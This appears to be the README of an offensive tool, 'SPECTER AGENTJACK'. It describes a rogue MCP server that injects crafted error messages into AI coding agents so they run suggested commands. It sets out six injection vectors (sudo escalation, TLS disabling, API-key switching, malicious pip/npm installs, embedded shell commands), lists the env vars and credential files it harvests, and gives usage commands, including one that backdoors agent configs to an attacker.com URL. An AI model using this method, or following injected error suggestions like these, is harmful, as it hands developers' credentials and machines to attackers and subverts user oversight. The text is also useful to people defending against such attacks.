MCP Error-Path Injection Engine. Rogue MCP server injects crafted JSON-RPC error messages that trigger corrective reasoning loops in AI coding agents. Claude Code, Cursor, Copilot, Windsurf, Kiro — all hijackable via a single fake timeout.
SPECTER AGENTJACK is the L48 attack engine for MCP error-path injection. Modern AI coding agents (Claude Code, Cursor, GitHub Copilot, Windsurf, Kiro) use the Model Context Protocol to call external tools — fetch, filesystem, GitHub, Playwright, database. When a tool returns an error, the agent enters a corrective reasoning loop, trusting the error message as authoritative and following any suggestion it contains.
AGENTJACK deploys a rogue aiohttp Streamable HTTP MCP server (POST /mcp, MCP protocol version 2025-06-18) that impersonates legitimate servers like mcp-server-fetch. When the agent connects, the rogue server returns crafted JSON-RPC errors with embedded corrective suggestions — triggering privilege escalation, TLS bypass, credential exfiltration, malicious dependency installation, or direct shell command execution. Six injection vectors cover the full error taxonomy. At UNLEASHED gate, PERSIST writes the rogue server permanently into all five agent MCP config files.
Reads 5 agent MCP config paths: Claude Code (~/.claude/settings.json) · Cursor (.cursor/mcp.json / ~/.cursor/mcp.json) · Copilot (~/.copilot/mcp.json) · Windsurf (~/.codeium/windsurf/mcp_config.json) · Kiro (~/.kiro/settings.json). Returns MCPInventory with server list, transports, detected agent type, and port scan results. Fully passive — no network connections.
Passive fingerprinting of MCP server error response format. Probes existing HTTP MCP servers via MCPClient (urllib, tools/call with nonexistent tool). Known-server DB: mcp-server-fetch (code+message+data, retry=3) · playwright-mcp (code+message, retry=2) · github-mcp (code+message+data, retry=3) · filesystem-mcp (code+message, retry=1) · brave-search-mcp (code+message+data, retry=2). Returns ErrorProfile per agent type.
Builds JSON-RPC 2.0 error payload for selected vector. 6 vectors: TIMEOUT/-32001 (retry with elevated flags) · PERMISSION/-32002 (sudo/admin escalation) · CERTIFICATE/-32003 (NODE_TLS_REJECT_UNAUTHORIZED=0) · QUOTA/-32004 (switch API key from ~/.config) · DEPENDENCY/-32005 (malicious pip/npm install) · FETCH_RESPONSE/-32000 (embedded shell command in message + data.suggestion). Requires AGENTJACK_INJECT_KEY env var.
Deploys rogue aiohttp Streamable HTTP MCP server on random port. Handles MCP initialize handshake (returns mcp-server-fetch identity), tools/list (mirrors legitimate tool schema), tools/call (returns crafted error). Backs up agent MCP config, injects "agentjack-rogue" server entry, waits for agent connection. atexit + SIGTERM + SIGHUP signal handlers auto-restore config on exit or crash. start_rogue_server_only() option for INJECT gate without config touch.
Polls rogue server call log for evidence that agent entered corrective reasoning. Per-vector trigger indicators: TIMEOUT (retry/elevated/no-timeout), PERMISSION (sudo/elevated/privilege), CERTIFICATE (insecure/tls_reject/ssl_verify=false), QUOTA (api_key/switch/alternate), DEPENDENCY (pip install/npm install), FETCH_RESPONSE (curl/bash/exec). Extracts credentials from tool call arguments via 5 regex patterns (sk-ant-/AKIA/gh[ps]_/sk-/AIza).
Environment and filesystem credential harvest. 12 env var patterns (ANTHROPIC_API_KEY/OPENAI_API_KEY/AWS_ACCESS_KEY_ID/AWS_SECRET_ACCESS_KEY/GITHUB_TOKEN/AZURE_OPENAI_KEY/COHERE_API_KEY/HUGGINGFACE_TOKEN/GITLAB_TOKEN/DIGITALOCEAN_TOKEN/CLOUDFLARE_API_TOKEN/STRIPE_SECRET_KEY). 8 credential file paths (~/.aws/credentials, ~/.anthropic/api_key, ~/.config/gh/hosts.yml, ~/.kube/config, etc.). WARLORD routing: AWS creds → T130 CHARYBDIS · AI API keys → T134 RAPTOR · GitHub tokens → T122 GHOST.
Permanent MCP config backdoor across all 5 AI coding agents. Backs up each config to {path}.ajk-persist.bak, injects "agentjack-persist" streamable-http server entry pointing to attacker URL. Generates kill-switch one-liner restoring all backups. Requires Ed25519 key (AGENTJACK_SIGNING_KEY) + ROE file containing "mcp error-path injection and agent backdoor authorised" + confirmation phrase "I UNDERSTAND THIS WILL PERMANENTLY BACKDOOR AI CODING AGENT MCP CONFIG".
| Vector | Error Code | Agent Behaviour | Attack Outcome |
|---|---|---|---|
| TIMEOUT | -32001 | Retries with elevated flags (--no-timeout, --elevated) | Privilege escalation in agent context |
| PERMISSION | -32002 | Executes sudo or admin override per suggestion | Elevated shell execution, system access |
| CERTIFICATE | -32003 | Sets NODE_TLS_REJECT_UNAUTHORIZED=0 or --insecure | TLS MITM on subsequent requests, credential interception |
| QUOTA | -32004 | Switches to alternate API key from ~/.config or env | API key exfiltration (Anthropic, OpenAI, AWS, etc.) |
| DEPENDENCY | -32005 | Executes pip install / npm install per suggestion | Supply chain RCE via malicious package postinstall hook |
| FETCH_RESPONSE | -32000 | Executes embedded shell command as "corrective action" | Direct RCE, reverse shell, credential exfil via curl beacon |
All SPECTER AGENTJACK reports use AJK-{hex12} IDs. UNLEASHED executions require a live Ed25519 signing key (AGENTJACK_SIGNING_KEY env var) and a ROE file containing "mcp error-path injection and agent backdoor authorised". Reports are dual-signed: Ed25519 (pynacl) + ML-DSA-65 stub (3309-byte deterministic signature). Reports include: inventory, fingerprint profile, delivery confirmation, trigger evidence, escalation credentials, persistence report, WARLORD routing, severity classification.
M166 AGENTJACK SENTINEL (planned) — Will detect: rogue MCP server impersonation, crafted error message injection, corrective reasoning manipulation, MCP config backdoor insertion, AutoJack WebSocket exploitation. Defensive pair for L48 Agentic Tool Error Exploitation.
pip install git+https://github.com/RichardBarron27/red-specter-specter-agentjack.git specter-agentjack --help
# Enumerate MCP servers (OPEN gate — no key required) specter-agentjack enumerate # Fingerprint error formats (OPEN gate) specter-agentjack fingerprint # Craft injection payload (INJECT gate) export AGENTJACK_INJECT_KEY="$(cat ~/.config/red-specter/agentjack-inject.key)" specter-agentjack craft --vector TIMEOUT --target-tool fetch # Deliver error via rogue server (INJECT gate) specter-agentjack deliver --vector PERMISSION --agent claude-code # UNLEASHED persistent backdoor specter-agentjack persist \ --rogue-url http://attacker.com:8080/mcp \ --roe-file ./roe.txt \ --signing-key ~/.config/red-specter/agentjack-signing.key \ --confirm "I UNDERSTAND THIS WILL PERMANENTLY BACKDOOR AI CODING AGENT MCP CONFIG"
| Technique | AGENTJACK Subsystem |
|---|---|
| AML.T0054 — LLM Jailbreak | CRAFT-INJECT (corrective reasoning loop manipulation) |
| AML.T0051 — LLM Prompt Injection | DELIVER-ERROR (error message + data.suggestion injection) |
| T1204 — User Execution | TRIGGER-REASONING (agent executes suggested command) |
| T1059 — Command Scripting | CRAFT-INJECT FETCH_RESPONSE (embedded shell command) |
| T1552 — Unsecured Credentials | ESCALATE (env var + credential file harvest) |
| T1078 — Valid Accounts | ESCALATE (API key validation + WARLORD routing) |
| T1071 — App Layer Protocol | DELIVER-ERROR (MCP Streamable HTTP C2) |